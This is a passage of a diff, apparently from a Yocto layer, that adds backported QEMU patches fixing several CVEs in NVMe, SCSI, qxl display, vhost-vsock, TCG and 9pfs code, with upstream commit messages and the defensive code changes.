+device itself. This still allows DMA to MMIO regions of other devices
+(e.g. doing P2P DMA to the controller memory buffer of another NVMe
+device).
+
+Fixes: CVE-2021-3929
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Reviewed-by: Keith Busch <kbusch@kernel.org>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Klaus Jensen <k.jensen@samsung.com>
+
+Upstream-Status: Backport
+[https://gitlab.com/qemu-project/qemu/-/commit/736b01642d85be832385]
+CVE: CVE-2021-3929
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+Signed-off-by: Gaurav Gupta <gauragup@cisco.com>
+---
+ hw/block/nvme.c | 23 +++++++++++++++++++++++
+ hw/block/nvme.h |  1 +
+ 2 files changed, 24 insertions(+)
+
+diff --git a/hw/block/nvme.c b/hw/block/nvme.c
+index bda446d..ae9b19f 100644
+--- a/hw/block/nvme.c
++++ b/hw/block/nvme.c
+@@ -60,8 +60,31 @@ static bool nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+     return addr >= low && addr < hi;
+ }
+ 
++static inline bool nvme_addr_is_iomem(NvmeCtrl *n, hwaddr addr)
++{
++    hwaddr hi, lo;
++
++    /*
++     * The purpose of this check is to guard against invalid "local" access to
++     * the iomem (i.e. controller registers). Thus, we check against the range
++     * covered by the 'bar0' MemoryRegion since that is currently composed of
++     * two subregions (the NVMe "MBAR" and the MSI-X table/pba). Note, however,
++     * that if the device model is ever changed to allow the CMB to be located
++     * in BAR0 as well, then this must be changed.
++     */
++    lo = n->bar0.addr;
++    hi = lo + int128_get64(n->bar0.size);
++
++    return addr >= lo && addr < hi;
++}
++
+ static int nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
+ {
++
++    if (nvme_addr_is_iomem(n, addr)) {
++	return NVME_DATA_TRAS_ERROR;
++    }
++
+     if (n->cmbsz && nvme_addr_is_cmb(n, addr)) {
+         memcpy(buf, (void *)&n->cmbuf[addr - n->ctrl_mem.addr], size);
+         return 0;
+diff --git a/hw/block/nvme.h b/hw/block/nvme.h
+index 557194e..5a2b119 100644
+--- a/hw/block/nvme.h
++++ b/hw/block/nvme.h
+@@ -59,6 +59,7 @@ typedef struct NvmeNamespace {
+ 
+ typedef struct NvmeCtrl {
+     PCIDevice    parent_obj;
++    MemoryRegion bar0;
+     MemoryRegion iomem;
+     MemoryRegion ctrl_mem;
+     NvmeBar      bar;
+-- 
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
new file mode 100644
index 0000000000..b1b5558647
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3930.patch
@@ -0,0 +1,53 @@
+From b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 4 Nov 2021 17:31:38 +0100
+Subject: [PATCH] hw/scsi/scsi-disk: MODE_PAGE_ALLS not allowed in MODE SELECT
+ commands
+
+This avoids an off-by-one read of 'mode_sense_valid' buffer in
+hw/scsi/scsi-disk.c:mode_sense_page().
+
+Fixes: CVE-2021-3930
+Cc: qemu-stable@nongnu.org
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Fixes: a8f4bbe2900 ("scsi-disk: store valid mode pages in a table")
+Fixes: #546
+Reported-by: Qiuhao Li <Qiuhao.Li@outlook.com>
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/b3af7fdf9cc537f8f0dd3e2423d83f5c99a457e8
+CVE: CVE-2021-3930
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/scsi-disk.c | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/hw/scsi/scsi-disk.c b/hw/scsi/scsi-disk.c
+index e8a547dbb7..d4914178ea 100644
+--- a/hw/scsi/scsi-disk.c
++++ b/hw/scsi/scsi-disk.c
+@@ -1087,6 +1087,7 @@ static int mode_sense_page(SCSIDiskState *s, int page, uint8_t **p_outbuf,
+     uint8_t *p = *p_outbuf + 2;
+     int length;
+ 
++    assert(page < ARRAY_SIZE(mode_sense_valid));
+     if ((mode_sense_valid[page] & (1 << s->qdev.type)) == 0) {
+         return -1;
+     }
+@@ -1428,6 +1429,11 @@ static int scsi_disk_check_mode_select(SCSIDiskState *s, int page,
+         return -1;
+     }
+ 
++    /* MODE_PAGE_ALLS is only valid for MODE SENSE commands */
++    if (page == MODE_PAGE_ALLS) {
++        return -1;
++    }
++
+     p = mode_current;
+     memset(mode_current, 0, inlen + 2);
+     len = mode_sense_page(s, page, &p, 0);
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
new file mode 100644
index 0000000000..80ad49e4ed
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4206.patch
@@ -0,0 +1,89 @@
+From fa892e9abb728e76afcf27323ab29c57fb0fe7aa Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:17:12 +0200
+Subject: [PATCH] ui/cursor: fix integer overflow in cursor_alloc
+ (CVE-2021-4206)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Prevent potential integer overflow by limiting 'width' and 'height' to
+512x512. Also change 'datasize' type to size_t. Refer to security
+advisory https://starlabs.sg/advisories/22-4206/ for more information.
+
+Fixes: CVE-2021-4206
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081712.345609-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/fa892e9a
+CVE: CVE-2021-4206
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 7 +++++++
+ hw/display/vmware_vga.c | 2 ++
+ ui/cursor.c             | 8 +++++++-
+ 3 files changed, 16 insertions(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index 237ed293ba..ca217004bf 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -247,6 +247,13 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+     size_t size;
+ 
+     c = cursor_alloc(cursor->header.width, cursor->header.height);
++
++    if (!c) {
++        qxl_set_guest_bug(qxl, "%s: cursor %ux%u alloc error", __func__,
++                cursor->header.width, cursor->header.height);
++        goto fail;
++    }
++
+     c->hot_x = cursor->header.hot_spot_x;
+     c->hot_y = cursor->header.hot_spot_y;
+     switch (cursor->header.type) {
+diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
+index 98c83474ad..45d06cbe25 100644
+--- a/hw/display/vmware_vga.c
++++ b/hw/display/vmware_vga.c
+@@ -515,6 +515,8 @@ static inline void vmsvga_cursor_define(struct vmsvga_state_s *s,
+     int i, pixels;
+ 
+     qc = cursor_alloc(c->width, c->height);
++    assert(qc != NULL);
++
+     qc->hot_x = c->hot_x;
+     qc->hot_y = c->hot_y;
+     switch (c->bpp) {
+diff --git a/ui/cursor.c b/ui/cursor.c
+index 1d62ddd4d0..835f0802f9 100644
+--- a/ui/cursor.c
++++ b/ui/cursor.c
+@@ -46,6 +46,8 @@ static QEMUCursor *cursor_parse_xpm(const char *xpm[])
+ 
+     /* parse pixel data */
+     c = cursor_alloc(width, height);
++    assert(c != NULL);
++
+     for (pixel = 0, y = 0; y < height; y++, line++) {
+         for (x = 0; x < height; x++, pixel++) {
+             idx = xpm[line][x];
+@@ -91,7 +93,11 @@ QEMUCursor *cursor_builtin_left_ptr(void)
+ QEMUCursor *cursor_alloc(int width, int height)
+ {
+     QEMUCursor *c;
+-    int datasize = width * height * sizeof(uint32_t);
++    size_t datasize = width * height * sizeof(uint32_t);
++
++    if (width > 512 || height > 512) {
++        return NULL;
++    }
+ 
+     c = g_malloc0(sizeof(QEMUCursor) + datasize);
+     c->width  = width;
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
new file mode 100644
index 0000000000..8418246247
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-4207.patch
@@ -0,0 +1,43 @@
+From 9569f5cb5b4bffa9d3ebc8ba7da1e03830a9a895 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Thu, 7 Apr 2022 10:11:06 +0200
+Subject: [PATCH] display/qxl-render: fix race condition in qxl_cursor
+ (CVE-2021-4207)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Avoid fetching 'width' and 'height' a second time to prevent possible
+race condition. Refer to security advisory
+https://starlabs.sg/advisories/22-4207/ for more information.
+
+Fixes: CVE-2021-4207
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20220407081106.343235-1-mcascell@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/9569f5cb
+CVE: CVE-2021-4207
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/display/qxl-render.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/display/qxl-render.c b/hw/display/qxl-render.c
+index d28849b121..237ed293ba 100644
+--- a/hw/display/qxl-render.c
++++ b/hw/display/qxl-render.c
+@@ -266,7 +266,7 @@ static QEMUCursor *qxl_cursor(PCIQXLDevice *qxl, QXLCursor *cursor,
+         }
+         break;
+     case SPICE_CURSOR_TYPE_ALPHA:
+-        size = sizeof(uint32_t) * cursor->header.width * cursor->header.height;
++        size = sizeof(uint32_t) * c->width * c->height;
+         qxl_unpack_chunks(c->data, size, qxl, &cursor->chunk, group_id);
+         if (qxl->debug > 2) {
+             cursor_print_ascii_art(c, "qxl/alpha");
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
new file mode 100644
index 0000000000..6a7ce0e26c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-1.patch
@@ -0,0 +1,42 @@
+From 6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8 Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Tue, 5 Jul 2022 22:05:43 +0200
+Subject: [PATCH] scsi/lsi53c895a: fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req->req to NULL to prevent reusing a free'd buffer in case of
+repeated SCSI cancel requests. Thanks to Thomas Huth for suggesting the patch.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Reviewed-by: Thomas Huth <thuth@redhat.com>
+Message-Id: <20220705200543.2366809-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/6c8fa961da5e60f574bb52fd3ad44b1e9e8ad4b8
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index c8773f73f7..99ea42d49b 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1028,8 +1028,9 @@ static void lsi_do_msgout(LSIState *s)
+         case 0x0d:
+             /* The ABORT TAG message clears the current I/O process only. */
+             trace_lsi_do_msgout_abort(current_tag);
+-            if (current_req) {
++            if (current_req && current_req->req) {
+                 scsi_req_cancel(current_req->req);
++                current_req->req = NULL;
+             }
+             lsi_disconnect(s);
+             break;
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
new file mode 100644
index 0000000000..137906cd30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-0216-2.patch
@@ -0,0 +1,52 @@
+From 4367a20cc442c56b05611b4224de9a61908f9eac Mon Sep 17 00:00:00 2001
+From: Mauro Matteo Cascella <mcascell@redhat.com>
+Date: Mon, 11 Jul 2022 14:33:16 +0200
+Subject: [PATCH] scsi/lsi53c895a: really fix use-after-free in lsi_do_msgout
+ (CVE-2022-0216)
+
+Set current_req to NULL, not current_req->req, to prevent reusing a free'd
+buffer in case of repeated SCSI cancel requests.  Also apply the fix to
+CLEAR QUEUE and BUS DEVICE RESET messages as well, since they also cancel
+the request.
+
+Thanks to Alexander Bulekov for providing a reproducer.
+
+Fixes: CVE-2022-0216
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/972
+Signed-off-by: Mauro Matteo Cascella <mcascell@redhat.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20220711123316.421279-1-mcascell@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/4367a20cc4
+CVE: CVE-2022-0216
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/lsi53c895a.c               |  3 +-
+ 1 files changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/hw/scsi/lsi53c895a.c b/hw/scsi/lsi53c895a.c
+index 99ea42d49b..ad5f5e5f39 100644
+--- a/hw/scsi/lsi53c895a.c
++++ b/hw/scsi/lsi53c895a.c
+@@ -1030,7 +1030,7 @@ static void lsi_do_msgout(LSIState *s)
+             trace_lsi_do_msgout_abort(current_tag);
+             if (current_req && current_req->req) {
+                 scsi_req_cancel(current_req->req);
+-                current_req->req = NULL;
++                current_req = NULL;
+             }
+             lsi_disconnect(s);
+             break;
+@@ -1056,6 +1056,7 @@ static void lsi_do_msgout(LSIState *s)
+             /* clear the current I/O process */
+             if (s->current) {
+                 scsi_req_cancel(s->current->req);
++                current_req = NULL;
+             }
+ 
+             /* As the current implemented devices scsi_disk and scsi_generic
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
new file mode 100644
index 0000000000..fc4d6cf3df
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-26354.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From 8d1b247f3748ac4078524130c6d7ae42b6140aaf Mon Sep 17 00:00:00 2001
+From: Stefano Garzarella <sgarzare@redhat.com>
+Date: Mon, 28 Feb 2022 10:50:58 +0100
+Subject: [PATCH] vhost-vsock: detach the virqueue element in case of error
+
+In vhost_vsock_common_send_transport_reset(), if an element popped from
+the virtqueue is invalid, we should call virtqueue_detach_element() to
+detach it from the virtqueue before freeing its memory.
+
+Fixes: fc0b9b0e1c ("vhost-vsock: add virtio sockets device")
+Fixes: CVE-2022-26354
+Cc: qemu-stable@nongnu.org
+Reported-by: VictorV <vv474172261@gmail.com>
+Signed-off-by: Stefano Garzarella <sgarzare@redhat.com>
+Message-Id: <20220228095058.27899-1-sgarzare@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+CVE: CVE-2022-26354
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2022-26354.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8d1b247f3748ac4078524130c6d7ae42b6140aaf ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/virtio/vhost-vsock-common.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+--- a/hw/virtio/vhost-vsock.c
++++ b/hw/virtio/vhost-vsock.c
+@@ -221,19 +221,23 @@ static void vhost_vsock_send_transport_r
+     if (elem->out_num) {
+         error_report("invalid vhost-vsock event virtqueue element with "
+                      "out buffers");
+-        goto out;
++        goto err;
+     }
+ 
+     if (iov_from_buf(elem->in_sg, elem->in_num, 0,
+                      &event, sizeof(event)) != sizeof(event)) {
+         error_report("vhost-vsock event virtqueue element is too short");
+-        goto out;
++        goto err;
+     }
+ 
+     virtqueue_push(vq, elem, sizeof(event));
+     virtio_notify(VIRTIO_DEVICE(vsock), vq);
+ 
+-out:
++    g_free(elem);
++    return;
++
++err:
++    virtqueue_detach_element(vq, elem, 0);
+     g_free(elem);
+ }
+ 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
new file mode 100644
index 0000000000..4196ebcf98
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-35414.patch
@@ -0,0 +1,53 @@
+From 09a07b5b39c87423df9e8f6574c19a14d36beac5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 27 Jul 2022 10:34:12 +0530
+Subject: [PATCH] CVE-2022-35414
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/418ade7849ce7641c0f7333718caf5091a02fd4c]
+CVE: CVE-2022-35414
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ exec.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/exec.c b/exec.c
+index 43c70ffb..2d6add46 100644
+--- a/exec.c
++++ b/exec.c
+@@ -685,7 +685,7 @@ static void tcg_iommu_free_notifier_list(CPUState *cpu)
+ 
+ /* Called from RCU critical section */
+ MemoryRegionSection *
+-address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
++address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr orig_addr,
+                                   hwaddr *xlat, hwaddr *plen,
+                                   MemTxAttrs attrs, int *prot)
+ {
+@@ -694,6 +694,7 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+     IOMMUMemoryRegionClass *imrc;
+     IOMMUTLBEntry iotlb;
+     int iommu_idx;
++    hwaddr addr = orig_addr;
+     AddressSpaceDispatch *d = atomic_rcu_read(&cpu->cpu_ases[asidx].memory_dispatch);
+ 
+     for (;;) {
+@@ -737,6 +738,16 @@ address_space_translate_for_iotlb(CPUState *cpu, int asidx, hwaddr addr,
+     return section;
+ 
+ translate_fail:
++    /*
++     * We should be given a page-aligned address -- certainly
++     * tlb_set_page_with_attrs() does so.  The page offset of xlat
++     * is used to index sections[], and PHYS_SECTION_UNASSIGNED = 0.
++     * The page portion of xlat will be logged by memory_region_access_valid()
++     * when this memory access is rejected, so use the original untranslated
++     * physical address.
++     */
++    assert((orig_addr & ~TARGET_PAGE_MASK) == 0);
++    *xlat = orig_addr;
+     return &d->map.sections[PHYS_SECTION_UNASSIGNED];
+ }
+ #endif
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
new file mode 100644
index 0000000000..3f0d5fbd5c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2022-4144.patch
@@ -0,0 +1,103 @@
+From 6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@linaro.org>
+Date: Mon, 28 Nov 2022 21:27:40 +0100
+Subject: [PATCH] hw/display/qxl: Avoid buffer overrun in qxl_phys2virt
+ (CVE-2022-4144)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Have qxl_get_check_slot_offset() return false if the requested
+buffer size does not fit within the slot memory region.
+
+Similarly qxl_phys2virt() now returns NULL in such case, and
+qxl_dirty_one_surface() aborts.
+
+This avoids buffer overrun in the host pointer returned by
+memory_region_get_ram_ptr().
+
+Fixes: CVE-2022-4144 (out-of-bounds read)
+Reported-by: Wenxu Yin (@awxylitol)
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1336
+
+Signed-off-by: Philippe Mathieu-Daudé <philmd@linaro.org>
+Signed-off-by: Stefan Hajnoczi <stefanha@redhat.com>
+Message-Id: <20221128202741.4945-5-philmd@linaro.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/6dbbf055148c6f1b7d8a3251a65bd6f3d1e1f622]
+CVE: CVE-2022-4144
+Comments: Deleted patch hunk in qxl.h,as it contains change
+in comments which is not present in current version of qemu.
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ hw/display/qxl.c | 27 +++++++++++++++++++++++----
+ 1 file changed, 23 insertions(+), 4 deletions(-)
+
+diff --git a/hw/display/qxl.c b/hw/display/qxl.c
+index cd7eb39d..6bc8385b 100644
+--- a/hw/display/qxl.c
++++ b/hw/display/qxl.c
+@@ -1440,11 +1440,13 @@ static void qxl_reset_surfaces(PCIQXLDevice *d)
+ 
+ /* can be also called from spice server thread context */
+ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+-                                      uint32_t *s, uint64_t *o)
++                                      uint32_t *s, uint64_t *o,
++                                      size_t size_requested)
+ {
+     uint64_t phys   = le64_to_cpu(pqxl);
+     uint32_t slot   = (phys >> (64 -  8)) & 0xff;
+     uint64_t offset = phys & 0xffffffffffff;
++    uint64_t size_available;
+ 
+     if (slot >= NUM_MEMSLOTS) {
+         qxl_set_guest_bug(qxl, "slot too large %d >= %d", slot,
+@@ -1468,6 +1470,23 @@ static bool qxl_get_check_slot_offset(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+                           slot, offset, qxl->guest_slots[slot].size);
+         return false;
+     }
++    size_available = memory_region_size(qxl->guest_slots[slot].mr);
++    if (qxl->guest_slots[slot].offset + offset >= size_available) {
++        qxl_set_guest_bug(qxl,
++                          "slot %d offset %"PRIu64" > region size %"PRIu64"\n",
++                          slot, qxl->guest_slots[slot].offset + offset,
++                          size_available);
++        return false;
++    }
++    size_available -= qxl->guest_slots[slot].offset + offset;
++    if (size_requested > size_available) {
++        qxl_set_guest_bug(qxl,
++                          "slot %d offset %"PRIu64" size %zu: "
++                          "overrun by %"PRIu64" bytes\n",
++                          slot, offset, size_requested,
++                          size_requested - size_available);
++        return false;
++    }
+ 
+     *s = slot;
+     *o = offset;
+@@ -1486,7 +1505,7 @@ void *qxl_phys2virt(PCIQXLDevice *qxl, QXLPHYSICAL pqxl, int group_id)
+         offset = le64_to_cpu(pqxl) & 0xffffffffffff;
+         return (void *)(intptr_t)offset;
+     case MEMSLOT_GROUP_GUEST:
+-        if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset)) {
++        if (!qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size)) {
+             return NULL;
+         }
+         ptr = memory_region_get_ram_ptr(qxl->guest_slots[slot].mr);
+@@ -1944,9 +1963,9 @@ static void qxl_dirty_one_surface(PCIQXLDevice *qxl, QXLPHYSICAL pqxl,
+     uint32_t slot;
+     bool rc;
+ 
+-    rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset);
+-    assert(rc == true);
+     size = (uint64_t)height * abs(stride);
++    rc = qxl_get_check_slot_offset(qxl, pqxl, &slot, &offset, size);
++    assert(rc == true);
+     trace_qxl_surfaces_dirty(qxl->id, offset, size);
+     qxl_set_dirty(qxl->guest_slots[slot].mr,
+                   qxl->guest_slots[slot].offset + offset,
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
new file mode 100644
index 0000000000..26e22b4c31
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-0330.patch
@@ -0,0 +1,77 @@
+[Ubuntu note: remove fuzz-lsi53c895a-test.c changes since the file does not
+ exist for this release]
+From b987718bbb1d0eabf95499b976212dd5f0120d75 Mon Sep 17 00:00:00 2001
+From: Thomas Huth <thuth@redhat.com>
+Date: Mon, 22 May 2023 11:10:11 +0200
+Subject: [PATCH] hw/scsi/lsi53c895a: Fix reentrancy issues in the LSI
+ controller (CVE-2023-0330)
+
+We cannot use the generic reentrancy guard in the LSI code, so
+we have to manually prevent endless reentrancy here. The problematic
+lsi_execute_script() function has already a way to detect whether
+too many instructions have been executed - we just have to slightly
+change the logic here that it also takes into account if the function
+has been called too often in a reentrant way.
+
+The code in fuzz-lsi53c895a-test.c has been taken from an earlier
+patch by Mauro Matteo Cascella.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/1563
+Message-Id: <20230522091011.1082574-1-thuth@redhat.com>
+Reviewed-by: Stefan Hajnoczi <stefanha@redhat.com>
+Reviewed-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Thomas Huth <thuth@redhat.com>
+
+Reference: https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.27
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2023-0330.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/qemu-project/qemu/-/commit/b987718bbb1d0eabf95499b976212dd5f0120d75]
+CVE: CVE-2023-0330
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/scsi/lsi53c895a.c               | 23 +++++++++++++++------
+ tests/qtest/fuzz-lsi53c895a-test.c | 33 ++++++++++++++++++++++++++++++
+ 2 files changed, 50 insertions(+), 6 deletions(-)
+
+--- qemu-4.2.orig/hw/scsi/lsi53c895a.c
++++ qemu-4.2/hw/scsi/lsi53c895a.c
+@@ -1135,15 +1135,24 @@ static void lsi_execute_script(LSIState
+     uint32_t addr, addr_high;
+     int opcode;
+     int insn_processed = 0;
++    static int reentrancy_level;
++
++    reentrancy_level++;
+ 
+     s->istat1 |= LSI_ISTAT1_SRUN;
+ again:
+-    if (++insn_processed > LSI_MAX_INSN) {
+-        /* Some windows drivers make the device spin waiting for a memory
+-           location to change.  If we have been executed a lot of code then
+-           assume this is the case and force an unexpected device disconnect.
+-           This is apparently sufficient to beat the drivers into submission.
+-         */
++    /*
++     * Some windows drivers make the device spin waiting for a memory location
++     * to change. If we have executed more than LSI_MAX_INSN instructions then
++     * assume this is the case and force an unexpected device disconnect. This
++     * is apparently sufficient to beat the drivers into submission.
++     *
++     * Another issue (CVE-2023-0330) can occur if the script is programmed to
++     * trigger itself again and again. Avoid this problem by stopping after
++     * being called multiple times in a reentrant way (8 is an arbitrary value
++     * which should be enough for all valid use cases).
++     */
++    if (++insn_processed > LSI_MAX_INSN || reentrancy_level > 8) {
+         if (!(s->sien0 & LSI_SIST0_UDC)) {
+             qemu_log_mask(LOG_GUEST_ERROR,
+                           "lsi_scsi: inf. loop with UDC masked");
+@@ -1597,6 +1606,8 @@ again:
+         }
+     }
+     trace_lsi_execute_script_stop();
++
++    reentrancy_level--;
+ }
+ 
+ static uint8_t lsi_reg_readb(LSIState *s, int offset)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
new file mode 100644
index 0000000000..70b7d6c562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2023-2861.patch
@@ -0,0 +1,178 @@
+From f6b0de53fb87ddefed348a39284c8e2f28dc4eda Mon Sep 17 00:00:00 2001
+From: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Date: Wed, 7 Jun 2023 18:29:33 +0200
+Subject: [PATCH] 9pfs: prevent opening special files (CVE-2023-2861)
+
+The 9p protocol does not specifically define how server shall behave when
+client tries to open a special file, however from security POV it does
+make sense for 9p server to prohibit opening any special file on host side
+in general. A sane Linux 9p client for instance would never attempt to
+open a special file on host side, it would always handle those exclusively
+on its guest side. A malicious client however could potentially escape
+from the exported 9p tree by creating and opening a device file on host
+side.
+
+With QEMU this could only be exploited in the following unsafe setups:
+
+  - Running QEMU binary as root AND 9p 'local' fs driver AND 'passthrough'
+    security model.
+
+or
+
+  - Using 9p 'proxy' fs driver (which is running its helper daemon as
+    root).
+
+These setups were already discouraged for safety reasons before,
+however for obvious reasons we are now tightening behaviour on this.
+
+Fixes: CVE-2023-2861
+Reported-by: Yanwu Shen <ywsPlz@gmail.com>
+Reported-by: Jietao Xiao <shawtao1125@gmail.com>
+Reported-by: Jinku Li <jkli@xidian.edu.cn>
+Reported-by: Wenbo Shen <shenwenbo@zju.edu.cn>
+Signed-off-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
